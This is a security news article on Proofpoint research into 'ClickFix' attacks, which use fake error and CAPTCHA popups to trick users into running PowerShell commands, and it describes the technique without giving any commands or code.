Researchers report rise in ‘ClickFix’ social engineering attacks

Technique uses fake error and CAPTCHA popups

Proofpoint researchers have documented a rise in a sophisticated social engineering technique known as “ClickFix”

ClickFix uses dialogue boxes with fake error messages to trick users into copying, pasting and running malicious scripts on their own computers, bypassing security measures.

The pop-up dialogue boxes appear on fake websites, or malicious files or attachments. On visiting such a site, or opening a file, the user is asked to help fix the error by copying and pasting the contents of the error message into PowerShell and running it.

A variant uses fake CAPTCHA popups, pretending to validate users with a “verify you are human” check, which then delivers malware.

This initial interaction starts a chain of events in which the victim’s system is infiltrated, with the potential for data exfiltration, further malware downloads or propagation of the malicious code.

In a blog post, Proofpoint’s researchers said that malware associated with ClickFix campaigns includes AsyncRAT, Danabot, DarkGate, Lumma Stealer and NetSupport.

“What’s insidious about this technique is the adversaries are preying on people’s innate desire to be helpful and independent,” the researchers note.

“By providing what appears to be both a problem and a solution, people feel empowered to ‘fix’ the issue themselves without needing to alert their IT team or anyone else, and it bypasses security protections by having the person infect themselves.”

In a recent example, an email warning supposedly from GitHub contained a link to a fake GitHub website, with the attack deploying the open source toolkit reCAPTCHA Phish. “The fake website used the reCAPTCHA Phish and ClickFix social engineering technique to trick users into executing a PowerShell command on their computer,” the researchers write.

Threat actors have been observed using ClickFix against government organisations in Ukraine, but it has also been adopted by financially motivated groups and appears to be becoming more popular.

Its adoption is likely a result of more traditional methods such as infected macros and fake invoices becoming less effective, and malicious documents being automatically blocked by security tools.

The rapid rise of incidents suggests that it is an effective technique for attackers, and organisations should take measures to alert employees about this new form of attack and warn them about the danger signs.